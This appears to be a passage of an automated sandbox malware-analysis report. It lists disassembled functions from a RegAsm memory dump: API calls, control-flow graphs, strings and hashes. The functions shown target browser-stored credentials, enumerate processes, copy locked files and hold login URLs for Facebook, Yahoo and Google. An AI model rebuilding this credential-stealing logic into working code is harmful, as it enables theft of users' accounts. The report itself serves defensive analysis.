                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                • memset.MSVCRT ref: 0040B851
                                                                • memset.MSVCRT ref: 0040B8CA
                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • memset.MSVCRT ref: 0040BB53
                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                • String ID: chp$v10
                                                                • API String ID: 4290143792-2783969131
                                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 529 4093b1 516->529 530 4094ff-40950b call 443d90 516->530 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 529->531 530->510 539 40950d-409511 530->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->530 553->522 555 40929f-4092a3 553->555 555->522 556 4092a9-4092ba 555->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                                APIs
                                                                • memset.MSVCRT ref: 004091E2
                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                • String ID:
                                                                • API String ID: 3715365532-3916222277
                                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 593 413e79-413e9d call 413959 call 413ca4 585->593 594 413e28-413e35 585->594 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 591 413edb-413ee2 588->591 589->591 599 413ee4 591->599 600 413ee7-413efe 591->600 605 413ea2-413eae CloseHandle 593->605 597 413e61-413e68 594->597 598 413e37-413e44 GetModuleHandleW 594->598 597->593 601 413e6a-413e76 597->601 598->597 603 413e46-413e5c GetProcAddress 598->603 599->600 600->581 601->593 603->597 605->584
                                                                APIs
                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                • memset.MSVCRT ref: 00413D7F
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                • memset.MSVCRT ref: 00413E07
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                • free.MSVCRT ref: 00413EC1
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                • API String ID: 1344430650-1740548384
                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                • String ID: bhv
                                                                • API String ID: 4234240956-2689659898
                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 634 413f4f-413f52 635 413fa5 634->635 636 413f54-413f5a call 40a804 634->636 638 413f5f-413fa4 GetProcAddress * 5 636->638 638->635
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                • API String ID: 2941347001-70141382
                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 639 4466f4-44670e call 446904 GetModuleHandleA 642 446710-44671b 639->642 643 44672f-446732 639->643 642->643 644 44671d-446726 642->644 645 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 643->645 646 446747-44674b 644->646 647 446728-44672d 644->647 652 4467ac-4467b7 __setusermatherr 645->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 645->653 646->643 651 44674d-44674f 646->651 647->643 650 446734-44673b 647->650 650->643 654 44673d-446745 650->654 655 446755-446758 651->655 652->653 658 446810-446819 653->658 659 44681e-446825 653->659 654->655 655->645 660 4468d8-4468dd call 44693d 658->660 661 446827-446832 659->661 662 44686c-446870 659->662 665 446834-446838 661->665 666 44683a-44683e 661->666 663 446845-44684b 662->663 664 446872-446877 662->664 670 446853-446864 GetStartupInfoW 663->670 671 44684d-446851 663->671 664->662 665->661 665->666 666->663 668 446840-446842 666->668 668->663 672 446866-44686a 670->672 673 446879-44687b 670->673 671->668 671->670 674 44687c-446894 GetModuleHandleA call 41276d 672->674 673->674 677 446896-446897 exit 674->677 678 44689d-4468d6 _cexit 674->678 677->678 678->660
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                • String ID:
                                                                • API String ID: 2827331108-0
                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 0040C298
                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • wcschr.MSVCRT ref: 0040C324
                                                                • wcschr.MSVCRT ref: 0040C344
                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                • String ID: visited:
                                                                • API String ID: 1157525455-1702587658
                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 705 40e175-40e1a1 call 40695d call 406b90 710 40e1a7-40e1e5 memset 705->710 711 40e299-40e2a8 call 4069a3 705->711 713 40e1e8-40e1fa call 406e8f 710->713 717 40e270-40e27d call 406b53 713->717 718 40e1fc-40e219 call 40dd50 * 2 713->718 717->713 724 40e283-40e286 717->724 718->717 729 40e21b-40e21d 718->729 725 40e291-40e294 call 40aa04 724->725 726 40e288-40e290 free 724->726 725->711 726->725 729->717 730 40e21f-40e235 call 40742e 729->730 730->717 733 40e237-40e242 call 40aae3 730->733 733->717 736 40e244-40e26b _snwprintf call 40a8d0 733->736 736->717
                                                                APIs
                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • memset.MSVCRT ref: 0040E1BD
                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                • free.MSVCRT ref: 0040E28B
                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                • API String ID: 2804212203-2982631422
                                                                • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                • memset.MSVCRT ref: 0040BC75
                                                                • memset.MSVCRT ref: 0040BC8C
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                • String ID:
                                                                • API String ID: 115830560-3916222277
                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 0041249C
                                                                • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                • wcscpy.MSVCRT ref: 004125A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                • String ID: r!A
                                                                • API String ID: 2791114272-628097481
                                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                • API String ID: 2936932814-4196376884
                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 847 40b58d-40b59e 848 40b5a4-40b5c0 GetModuleHandleW FindResourceW 847->848 849 40b62e-40b632 847->849 850 40b5c2-40b5ce LoadResource 848->850 851 40b5e7 848->851 850->851 852 40b5d0-40b5e5 SizeofResource LockResource 850->852 853 40b5e9-40b5eb 851->853 852->853 853->849 854 40b5ed-40b5ef 853->854 854->849 855 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 854->855 855->849
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
